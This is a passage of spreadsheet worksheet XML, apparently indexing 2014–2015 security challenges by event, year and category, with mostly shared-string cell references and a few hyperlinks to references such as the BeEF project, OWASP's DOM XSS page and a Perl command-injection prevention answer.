        <v>227</v>
      </c>
      <c r="H105" s="3"/>
    </row>
    <row r="106">
      <c r="A106" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B106" s="43">
        <v>2015.0</v>
      </c>
      <c r="C106" s="5" t="s">
        <v>685</v>
      </c>
      <c r="D106" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E106" s="3"/>
      <c r="F106" s="5" t="s">
        <v>686</v>
      </c>
      <c r="G106" s="5" t="s">
        <v>227</v>
      </c>
      <c r="H106" s="3"/>
    </row>
    <row r="107">
      <c r="A107" s="60" t="s">
        <v>673</v>
      </c>
      <c r="B107" s="43">
        <v>2015.0</v>
      </c>
      <c r="C107" s="5" t="s">
        <v>687</v>
      </c>
      <c r="D107" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E107" s="3"/>
      <c r="F107" s="5" t="s">
        <v>688</v>
      </c>
      <c r="G107" s="5" t="s">
        <v>682</v>
      </c>
      <c r="H107" s="3"/>
    </row>
    <row r="108">
      <c r="A108" s="17">
        <v>42535.0</v>
      </c>
      <c r="B108" s="7"/>
      <c r="C108" s="6"/>
      <c r="D108" s="6"/>
      <c r="E108" s="6"/>
      <c r="F108" s="6"/>
      <c r="G108" s="6"/>
      <c r="H108" s="6"/>
      <c r="I108" s="8"/>
      <c r="J108" s="8"/>
      <c r="K108" s="9"/>
      <c r="L108" s="9"/>
      <c r="M108" s="9"/>
      <c r="N108" s="9"/>
      <c r="O108" s="9"/>
      <c r="P108" s="9"/>
      <c r="Q108" s="9"/>
      <c r="R108" s="9"/>
      <c r="S108" s="9"/>
      <c r="T108" s="9"/>
      <c r="U108" s="9"/>
      <c r="V108" s="9"/>
      <c r="W108" s="9"/>
      <c r="X108" s="9"/>
      <c r="Y108" s="9"/>
      <c r="Z108" s="9"/>
    </row>
    <row r="109">
      <c r="A109" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B109" s="31">
        <v>2014.0</v>
      </c>
      <c r="C109" s="30" t="s">
        <v>691</v>
      </c>
      <c r="D109" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E109" s="30" t="s">
        <v>692</v>
      </c>
      <c r="F109" s="40" t="s">
        <v>693</v>
      </c>
      <c r="G109" s="13" t="s">
        <v>694</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B110" s="31">
        <v>2015.0</v>
      </c>
      <c r="C110" s="30" t="s">
        <v>696</v>
      </c>
      <c r="D110" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E110" s="30" t="s">
        <v>697</v>
      </c>
      <c r="F110" s="35" t="s">
        <v>698</v>
      </c>
      <c r="G110" s="35" t="s">
        <v>699</v>
      </c>
      <c r="H110" s="30" t="s">
        <v>700</v>
      </c>
      <c r="I110" s="30"/>
      <c r="J110" s="30"/>
    </row>
    <row r="111">
      <c r="A111" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B111" s="43">
        <v>2015.0</v>
      </c>
      <c r="C111" s="5" t="s">
        <v>702</v>
      </c>
      <c r="D111" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E111" s="5" t="s">
        <v>42</v>
      </c>
      <c r="F111" s="5" t="s">
        <v>703</v>
      </c>
      <c r="G111" s="5" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B112" s="43">
        <v>2015.0</v>
      </c>
      <c r="C112" s="5" t="s">
        <v>705</v>
      </c>
      <c r="D112" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E112" s="5" t="s">
        <v>300</v>
      </c>
      <c r="F112" s="5" t="s">
        <v>706</v>
      </c>
      <c r="G112" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B113" s="40">
        <v>2014.0</v>
      </c>
      <c r="C113" s="40" t="s">
        <v>707</v>
      </c>
      <c r="D113" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E113" s="40" t="s">
        <v>63</v>
      </c>
      <c r="F113" s="40" t="s">
        <v>708</v>
      </c>
      <c r="G113" s="40" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B114" s="40">
        <v>2014.0</v>
      </c>
      <c r="C114" s="40" t="s">
        <v>710</v>
      </c>
      <c r="D114" s="40" t="s">
        <v>128</v>
      </c>
      <c r="F114" s="40" t="s">
        <v>711</v>
      </c>
      <c r="G114" s="40" t="s">
        <v>712</v>
      </c>
      <c r="H114" s="62" t="s">
        <v>713</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B115" s="40">
        <v>2014.0</v>
      </c>
      <c r="C115" s="40" t="s">
        <v>721</v>
      </c>
      <c r="D115" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E115" s="40" t="s">
        <v>723</v>
      </c>
      <c r="F115" s="40" t="s">
        <v>517</v>
      </c>
      <c r="G115" s="40" t="s">
        <v>725</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="s">
        <v>726</v>
      </c>
      <c r="B116" s="43">
        <v>2015.0</v>
      </c>
      <c r="C116" s="5" t="s">
        <v>729</v>
      </c>
      <c r="D116" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E116" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F116" s="5" t="s">
        <v>731</v>
      </c>
      <c r="G116" s="5" t="s">
        <v>733</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="s">
        <v>726</v>
      </c>
      <c r="B117" s="43">
        <v>2015.0</v>
      </c>
      <c r="C117" s="5" t="s">
        <v>734</v>
      </c>
      <c r="D117" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E117" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F117" s="5" t="s">
        <v>735</v>
      </c>
      <c r="G117" s="5" t="s">
        <v>736</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="s">
        <v>726</v>
      </c>
      <c r="B118" s="43">
        <v>2015.0</v>
      </c>
      <c r="C118" s="5" t="s">
        <v>737</v>
      </c>
      <c r="D118" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E118" s="3"/>
      <c r="F118" s="5" t="s">
        <v>738</v>
      </c>
      <c r="G118" s="5" t="s">
        <v>739</v>
      </c>
      <c r="H118" s="5" t="s">
        <v>740</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="17">
        <v>42538.0</v>
      </c>
      <c r="B119" s="7"/>
      <c r="C119" s="6"/>
      <c r="D119" s="6"/>
      <c r="E119" s="6"/>
      <c r="F119" s="6"/>
      <c r="G119" s="6"/>
      <c r="H119" s="6"/>
      <c r="I119" s="8"/>
      <c r="J119" s="8"/>
      <c r="K119" s="9"/>
      <c r="L119" s="9"/>
      <c r="M119" s="9"/>
      <c r="N119" s="9"/>
      <c r="O119" s="9"/>
      <c r="P119" s="9"/>
      <c r="Q119" s="9"/>
      <c r="R119" s="9"/>
      <c r="S119" s="9"/>
      <c r="T119" s="9"/>
      <c r="U119" s="9"/>
      <c r="V119" s="9"/>
      <c r="W119" s="9"/>
      <c r="X119" s="9"/>
      <c r="Y119" s="9"/>
      <c r="Z119" s="9"/>
    </row>
    <row r="120">
      <c r="A120" s="5" t="s">
        <v>741</v>
      </c>
      <c r="B120" s="43">
        <v>2015.0</v>
      </c>
      <c r="C120" s="5" t="s">
        <v>742</v>
      </c>
      <c r="D120" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E120" s="5" t="s">
        <v>42</v>
      </c>
      <c r="F120" s="5" t="s">
        <v>743</v>
      </c>
      <c r="G120" s="5" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="s">
        <v>741</v>
      </c>
      <c r="B121" s="43">
        <v>2015.0</v>
      </c>
      <c r="C121" s="5" t="s">
        <v>747</v>
      </c>
      <c r="D121" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E121" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F121" s="5" t="s">
        <v>748</v>
      </c>
      <c r="G121" s="13" t="s">
        <v>749</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="s">
        <v>741</v>
      </c>
      <c r="B122" s="43">
        <v>2015.0</v>
      </c>
      <c r="C122" s="5" t="s">
        <v>750</v>
      </c>
      <c r="D122" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E122" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F122" s="5" t="s">
        <v>751</v>
      </c>
      <c r="G122" s="5" t="s">
        <v>752</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="s">
        <v>754</v>
      </c>
      <c r="B123" s="43">
        <v>2015.0</v>
      </c>
      <c r="C123" s="5" t="s">
        <v>756</v>
      </c>
      <c r="D123" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E123" s="5" t="s">
        <v>757</v>
      </c>
      <c r="F123" s="5" t="s">
        <v>758</v>
      </c>
      <c r="G123" s="5" t="s">
        <v>759</v>
      </c>
      <c r="H123" s="5" t="s">
        <v>760</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="s">
        <v>754</v>
      </c>
      <c r="B124" s="43">
        <v>2015.0</v>
      </c>
      <c r="C124" s="5" t="s">
        <v>761</v>
      </c>
      <c r="D124" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E124" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F124" s="5" t="s">
        <v>762</v>
      </c>
      <c r="G124" s="13" t="s">
        <v>763</v>
      </c>
      <c r="H124" s="3"/>
    </row>
    <row r="125">
      <c r="A125" s="5" t="s">
        <v>754</v>
      </c>
      <c r="B125" s="43">
        <v>2015.0</v>
      </c>
      <c r="C125" s="5" t="s">
        <v>765</v>
      </c>
      <c r="D125" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E125" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F125" s="5" t="s">
        <v>771</v>
      </c>
      <c r="G125" s="13" t="s">
        <v>774</v>
      </c>
      <c r="H125" s="3"/>
    </row>
    <row r="126">
      <c r="A126" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B126" s="31">
        <v>2015.0</v>
      </c>
      <c r="C126" s="30" t="s">
        <v>778</v>
      </c>
      <c r="D126" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E126" s="30" t="s">
        <v>779</v>
      </c>
      <c r="F126" s="35" t="s">
        <v>780</v>
      </c>
      <c r="G126" s="30" t="s">
        <v>781</v>
      </c>
      <c r="H126" s="33" t="str">
        <f>HYPERLINK("http://beefproject.com/","BeEF")</f>
        <v>BeEF</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B127" s="31">
        <v>2015.0</v>
      </c>
      <c r="C127" s="30" t="s">
        <v>795</v>
      </c>
      <c r="D127" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E127" s="30" t="s">
        <v>797</v>
      </c>
      <c r="F127" s="35" t="s">
        <v>798</v>
      </c>
      <c r="G127" s="13" t="s">
        <v>799</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B128" s="31">
        <v>2015.0</v>
      </c>
      <c r="C128" s="30" t="s">
        <v>801</v>
      </c>
      <c r="D128" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E128" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F128" s="35" t="s">
        <v>803</v>
      </c>
      <c r="G128" s="30" t="s">
        <v>805</v>
      </c>
      <c r="H128" s="30"/>
      <c r="I128" s="30"/>
    </row>
    <row r="129">
      <c r="A129" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B129" s="31">
        <v>2015.0</v>
      </c>
      <c r="C129" s="30" t="s">
        <v>807</v>
      </c>
      <c r="D129" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E129" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F129" s="35" t="s">
        <v>809</v>
      </c>
      <c r="G129" s="30" t="s">
        <v>811</v>
      </c>
      <c r="H129" s="30" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="17">
        <v>42542.0</v>
      </c>
      <c r="B130" s="65"/>
      <c r="C130" s="65"/>
      <c r="D130" s="65"/>
      <c r="E130" s="9"/>
      <c r="F130" s="65"/>
      <c r="G130" s="65"/>
      <c r="H130" s="66"/>
      <c r="I130" s="9"/>
      <c r="J130" s="9"/>
      <c r="K130" s="9"/>
      <c r="L130" s="9"/>
      <c r="M130" s="9"/>
      <c r="N130" s="9"/>
      <c r="O130" s="9"/>
      <c r="P130" s="9"/>
      <c r="Q130" s="9"/>
      <c r="R130" s="9"/>
      <c r="S130" s="9"/>
      <c r="T130" s="9"/>
      <c r="U130" s="9"/>
      <c r="V130" s="9"/>
      <c r="W130" s="9"/>
      <c r="X130" s="9"/>
      <c r="Y130" s="9"/>
      <c r="Z130" s="9"/>
    </row>
    <row r="131">
      <c r="A131" s="37">
        <v>9447.0</v>
      </c>
      <c r="B131" s="40">
        <v>2015.0</v>
      </c>
      <c r="C131" s="40" t="s">
        <v>832</v>
      </c>
      <c r="D131" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F131" s="40" t="s">
        <v>834</v>
      </c>
      <c r="G131" s="40" t="s">
        <v>835</v>
      </c>
      <c r="H131" s="67" t="s">
        <v>837</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B132" s="43">
        <v>2015.0</v>
      </c>
      <c r="C132" s="5" t="s">
        <v>842</v>
      </c>
      <c r="D132" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E132" s="3"/>
      <c r="F132" s="5" t="s">
        <v>845</v>
      </c>
      <c r="G132" s="13" t="s">
        <v>847</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B133" s="43">
        <v>2015.0</v>
      </c>
      <c r="C133" s="5" t="s">
        <v>851</v>
      </c>
      <c r="D133" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E133" s="5" t="s">
        <v>232</v>
      </c>
      <c r="F133" s="5" t="s">
        <v>852</v>
      </c>
      <c r="G133" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B134" s="43">
        <v>2015.0</v>
      </c>
      <c r="C134" s="5" t="s">
        <v>854</v>
      </c>
      <c r="D134" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E134" s="3"/>
      <c r="F134" s="5" t="s">
        <v>855</v>
      </c>
      <c r="G134" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B135" s="31">
        <v>2015.0</v>
      </c>
      <c r="C135" s="30" t="s">
        <v>858</v>
      </c>
      <c r="D135" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E135" s="30" t="s">
        <v>191</v>
      </c>
      <c r="F135" s="35" t="s">
        <v>861</v>
      </c>
      <c r="G135" s="30" t="s">
        <v>862</v>
      </c>
      <c r="H135" s="33" t="s">
        <v>863</v>
      </c>
    </row>
    <row r="136" ht="12.0" customHeight="1">
      <c r="A136" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B136" s="31">
        <v>2015.0</v>
      </c>
      <c r="C136" s="30" t="s">
        <v>871</v>
      </c>
      <c r="D136" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E136" s="33" t="str">
        <f>HYPERLINK("http://coffeescript.org/","coffescript")</f>
        <v>coffescript</v>
      </c>
      <c r="F136" s="35" t="s">
        <v>877</v>
      </c>
      <c r="G136" s="35" t="s">
        <v>881</v>
      </c>
      <c r="H136" s="30" t="s">
        <v>882</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B137" s="31">
        <v>2015.0</v>
      </c>
      <c r="C137" s="30" t="s">
        <v>885</v>
      </c>
      <c r="D137" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E137" s="30" t="s">
        <v>886</v>
      </c>
      <c r="F137" s="35" t="s">
        <v>887</v>
      </c>
      <c r="G137" s="30" t="s">
        <v>889</v>
      </c>
      <c r="H137" s="30"/>
    </row>
    <row r="138">
      <c r="A138" s="37">
        <v>9447.0</v>
      </c>
      <c r="B138" s="40">
        <v>2015.0</v>
      </c>
      <c r="C138" s="40" t="s">
        <v>891</v>
      </c>
      <c r="D138" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F138" s="40" t="s">
        <v>892</v>
      </c>
      <c r="G138" s="40" t="s">
        <v>893</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="37">
        <v>9447.0</v>
      </c>
      <c r="B139" s="40">
        <v>2015.0</v>
      </c>
      <c r="C139" s="40" t="s">
        <v>894</v>
      </c>
      <c r="D139" s="40" t="s">
        <v>128</v>
      </c>
      <c r="F139" s="40" t="s">
        <v>895</v>
      </c>
      <c r="G139" s="40" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="37">
        <v>9447.0</v>
      </c>
      <c r="B140" s="40">
        <v>2015.0</v>
      </c>
      <c r="C140" s="69" t="s">
        <v>897</v>
      </c>
      <c r="D140" s="40" t="s">
        <v>23</v>
      </c>
      <c r="G140" s="40" t="s">
        <v>904</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="37">
        <v>9447.0</v>
      </c>
      <c r="B141" s="40">
        <v>2015.0</v>
      </c>
      <c r="C141" s="40" t="s">
        <v>905</v>
      </c>
      <c r="D141" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F141" s="40" t="s">
        <v>906</v>
      </c>
      <c r="G141" s="40" t="s">
        <v>907</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B142" s="31">
        <v>2015.0</v>
      </c>
      <c r="C142" s="30" t="s">
        <v>908</v>
      </c>
      <c r="D142" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E142" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F142" s="30" t="s">
        <v>910</v>
      </c>
      <c r="G142" s="33" t="str">
        <f>HYPERLINK("http://www.coffeecup.com/help/articles/absolute-vs-relative-pathslinks/","relative vs absolute paths")</f>
        <v>relative vs absolute paths</v>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B143" s="31">
        <v>2015.0</v>
      </c>
      <c r="C143" s="30" t="s">
        <v>911</v>
      </c>
      <c r="D143" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E143" s="30" t="s">
        <v>96</v>
      </c>
      <c r="F143" s="35" t="s">
        <v>912</v>
      </c>
      <c r="G143" s="30" t="s">
        <v>913</v>
      </c>
      <c r="H143" s="33" t="str">
        <f>HYPERLINK("http://stackoverflow.com/questions/26614348/perl-open-injection-prevention/26614530#26614530","Prevent command injection in perl")</f>
        <v>Prevent command injection in perl</v>
      </c>
      <c r="I143" s="30"/>
    </row>
    <row r="144">
      <c r="A144" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B144" s="31">
        <v>2015.0</v>
      </c>
      <c r="C144" s="30" t="s">
        <v>917</v>
      </c>
      <c r="D144" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E144" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F144" s="73" t="s">
        <v>918</v>
      </c>
      <c r="G144" s="73" t="s">
        <v>918</v>
      </c>
      <c r="H144" s="30"/>
      <c r="I144" s="30"/>
    </row>
    <row r="145">
      <c r="A145" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B145" s="31">
        <v>2015.0</v>
      </c>
      <c r="C145" s="30" t="s">
        <v>930</v>
      </c>
      <c r="D145" s="30" t="s">
        <v>767</v>
      </c>
      <c r="E145" s="75" t="s">
        <v>931</v>
      </c>
      <c r="F145" s="78" t="s">
        <v>934</v>
      </c>
      <c r="G145" s="80" t="s">
        <v>944</v>
      </c>
      <c r="H145" s="81" t="str">
        <f>HYPERLINK("https://developer.chrome.com/devtools/docs/console","Chrome dev console")</f>
        <v>Chrome dev console</v>
      </c>
      <c r="I145" s="30"/>
    </row>
    <row r="146">
      <c r="A146" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B146" s="31">
        <v>2015.0</v>
      </c>
      <c r="C146" s="30" t="s">
        <v>956</v>
      </c>
      <c r="D146" s="30" t="s">
        <v>767</v>
      </c>
      <c r="E146" s="75" t="s">
        <v>25</v>
      </c>
      <c r="F146" s="78" t="s">
        <v>934</v>
      </c>
      <c r="G146" s="80" t="s">
        <v>957</v>
      </c>
      <c r="H146" s="30"/>
      <c r="I146" s="30"/>
    </row>
    <row r="147">
      <c r="A147" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B147" s="31">
        <v>2015.0</v>
      </c>
      <c r="C147" s="30" t="s">
        <v>958</v>
      </c>
      <c r="D147" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E147" s="30" t="s">
        <v>621</v>
      </c>
      <c r="F147" s="35" t="s">
        <v>960</v>
      </c>
      <c r="G147" s="30" t="s">
        <v>961</v>
      </c>
      <c r="H147" s="30"/>
      <c r="I147" s="30"/>
    </row>
    <row r="148">
      <c r="A148" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B148" s="31">
        <v>2015.0</v>
      </c>
      <c r="C148" s="30" t="s">
        <v>963</v>
      </c>
      <c r="D148" s="36" t="s">
        <v>48</v>
      </c>
      <c r="E148" s="30" t="s">
        <v>797</v>
      </c>
      <c r="F148" s="35" t="s">
        <v>964</v>
      </c>
      <c r="G148" s="30" t="s">
        <v>965</v>
      </c>
      <c r="H148" s="33" t="str">
        <f>HYPERLINK("https://www.owasp.org/index.php/DOM_Based_XSS","DOM XSS")</f>
        <v>DOM XSS</v>
      </c>
      <c r="I148" s="30"/>
    </row>
    <row r="149">
      <c r="A149" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B149" s="31">
        <v>2015.0</v>
      </c>
      <c r="C149" s="30" t="s">
        <v>971</v>
      </c>
      <c r="D149" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E149" s="30" t="s">
        <v>797</v>
      </c>
      <c r="F149" s="35" t="s">
        <v>973</v>
      </c>
      <c r="G149" s="30" t="s">
        <v>975</v>
      </c>
      <c r="H149" s="30"/>
      <c r="I149" s="30"/>
    </row>
    <row r="150">
      <c r="A150" s="30" t="s">
        <v>976</v>
      </c>
      <c r="B150" s="31">
        <v>2015.0</v>
      </c>
      <c r="C150" s="30" t="s">
        <v>978</v>
      </c>
      <c r="D150" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E150" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F150" s="35" t="s">
        <v>980</v>
      </c>
      <c r="G150" s="35" t="s">
        <v>981</v>
      </c>
      <c r="H150" s="30"/>
    </row>
    <row r="151">
      <c r="A151" s="30" t="s">
        <v>976</v>
      </c>
      <c r="B151" s="31">
        <v>2015.0</v>
      </c>
      <c r="C151" s="30" t="s">
        <v>984</v>
      </c>
      <c r="D151" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E151" s="30" t="s">
        <v>42</v>
      </c>
      <c r="F151" s="35" t="s">
        <v>960</v>
      </c>
      <c r="G151" s="30" t="s">
        <v>990</v>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="30" t="s">
        <v>976</v>
      </c>
      <c r="B152" s="31">
        <v>2015.0</v>
      </c>
      <c r="C152" s="30" t="s">
        <v>991</v>
      </c>
      <c r="D152" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E152" s="30" t="s">
        <v>992</v>
      </c>
      <c r="F152" s="35" t="s">
        <v>993</v>
      </c>
      <c r="G152" s="30" t="s">
        <v>994</v>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="30" t="s">
        <v>976</v>
      </c>
      <c r="B153" s="31">
        <v>2015.0</v>
      </c>
      <c r="C153" s="30" t="s">
        <v>999</v>
      </c>
      <c r="D153" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E153" s="30" t="s">
        <v>1001</v>
      </c>
      <c r="F153" s="35" t="s">
        <v>1003</v>
      </c>
      <c r="G153" s="30" t="s">
        <v>1005</v>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="30" t="s">
        <v>976</v>
      </c>
      <c r="B154" s="31">
        <v>2015.0</v>
      </c>
      <c r="C154" s="30" t="s">
        <v>1008</v>
      </c>
      <c r="D154" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E154" s="30" t="s">
        <v>1001</v>
      </c>
      <c r="F154" s="35" t="s">
        <v>1009</v>
      </c>
      <c r="G154" s="30" t="s">
        <v>1010</v>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B155" s="31">
        <v>2015.0</v>
      </c>
      <c r="C155" s="30" t="s">
        <v>1012</v>
      </c>
      <c r="D155" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E155" s="85" t="s">
        <v>71</v>
      </c>
      <c r="F155" s="35" t="s">
        <v>1023</v>
      </c>
      <c r="G155" s="30" t="s">
        <v>1025</v>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="17">
        <v>42545.0</v>
      </c>
      <c r="B156" s="65"/>
      <c r="C156" s="65"/>
      <c r="D156" s="65"/>
      <c r="E156" s="9"/>
      <c r="F156" s="65"/>
      <c r="G156" s="65"/>
      <c r="H156" s="66"/>
      <c r="I156" s="9"/>
      <c r="J156" s="9"/>
      <c r="K156" s="9"/>
      <c r="L156" s="9"/>
      <c r="M156" s="9"/>
      <c r="N156" s="9"/>
      <c r="O156" s="9"/>
      <c r="P156" s="9"/>
      <c r="Q156" s="9"/>
      <c r="R156" s="9"/>
      <c r="S156" s="9"/>
      <c r="T156" s="9"/>
      <c r="U156" s="9"/>
      <c r="V156" s="9"/>
      <c r="W156" s="9"/>
      <c r="X156" s="9"/>
      <c r="Y156" s="9"/>
      <c r="Z156" s="9"/>
    </row>
    <row r="157">
      <c r="A157" s="23" t="s">
        <v>1029</v>
      </c>
      <c r="B157" s="24">
        <v>2015.0</v>
      </c>
      <c r="C157" s="23" t="s">
        <v>1030</v>
      </c>
      <c r="D157" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E157" s="23" t="s">
        <v>25</v>
      </c>
      <c r="F157" s="23" t="s">
        <v>1033</v>
      </c>
      <c r="G157" s="23" t="s">
        <v>1035</v>
      </c>
      <c r="I157" s="28"/>
      <c r="J157" s="29"/>
      <c r="K157" s="29"/>
      <c r="L157" s="29"/>
      <c r="M157" s="29"/>
      <c r="N157" s="29"/>
      <c r="O157" s="29"/>
      <c r="P157" s="29"/>
      <c r="Q157" s="29"/>
      <c r="R157" s="29"/>
      <c r="S157" s="29"/>
      <c r="T157" s="29"/>
      <c r="U157" s="29"/>
      <c r="V157" s="29"/>
      <c r="W157" s="29"/>
      <c r="X157" s="29"/>
      <c r="Y157" s="29"/>
      <c r="Z157" s="29"/>
    </row>
    <row r="158">
      <c r="A158" s="23" t="s">
        <v>1029</v>
      </c>
      <c r="B158" s="24">
        <v>2015.0</v>
      </c>
      <c r="C158" s="23" t="s">
        <v>1036</v>
      </c>
      <c r="D158" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E158" s="23" t="s">
        <v>25</v>
      </c>
      <c r="F158" s="23" t="s">
        <v>1037</v>
      </c>
      <c r="G158" s="23" t="s">
        <v>1038</v>
      </c>
      <c r="J158" s="29"/>
      <c r="K158" s="29"/>
      <c r="L158" s="29"/>
      <c r="M158" s="29"/>
      <c r="N158" s="29"/>
      <c r="O158" s="29"/>
      <c r="P158" s="29"/>
      <c r="Q158" s="29"/>
      <c r="R158" s="29"/>
      <c r="S158" s="29"/>
      <c r="T158" s="29"/>
      <c r="U158" s="29"/>
      <c r="V158" s="29"/>
      <c r="W158" s="29"/>
      <c r="X158" s="29"/>
      <c r="Y158" s="29"/>
      <c r="Z158" s="29"/>
    </row>
    <row r="159">
      <c r="A159" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B159" s="71">
        <v>2015.0</v>
      </c>
      <c r="C159" s="70" t="s">
        <v>1042</v>
      </c>
      <c r="D159" s="70" t="s">
        <v>767</v>
      </c>
      <c r="E159" s="72"/>
      <c r="F159" s="70" t="s">
        <v>1044</v>
      </c>
      <c r="G159" s="70" t="s">
        <v>6</v>
      </c>
      <c r="H159" s="29"/>
      <c r="I159" s="29"/>
      <c r="J159" s="29"/>
      <c r="K159" s="29"/>
      <c r="L159" s="29"/>
      <c r="M159" s="29"/>
      <c r="N159" s="29"/>
      <c r="O159" s="29"/>
      <c r="P159" s="29"/>
      <c r="Q159" s="29"/>
      <c r="R159" s="29"/>
      <c r="S159" s="29"/>
      <c r="T159" s="29"/>
      <c r="U159" s="29"/>
      <c r="V159" s="29"/>
      <c r="W159" s="29"/>
      <c r="X159" s="29"/>
      <c r="Y159" s="29"/>
      <c r="Z159" s="29"/>
    </row>
    <row r="160">
      <c r="A160" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B160" s="71">
        <v>2015.0</v>
      </c>
      <c r="C160" s="70" t="s">
        <v>1046</v>
      </c>
      <c r="D160" s="70" t="s">
        <v>767</v>
      </c>
      <c r="E160" s="72"/>
      <c r="F160" s="70" t="s">
        <v>1047</v>
      </c>
      <c r="G160" s="70" t="s">
        <v>1048</v>
      </c>
      <c r="H160" s="29"/>
      <c r="I160" s="29"/>
      <c r="J160" s="29"/>
      <c r="K160" s="29"/>
      <c r="L160" s="29"/>
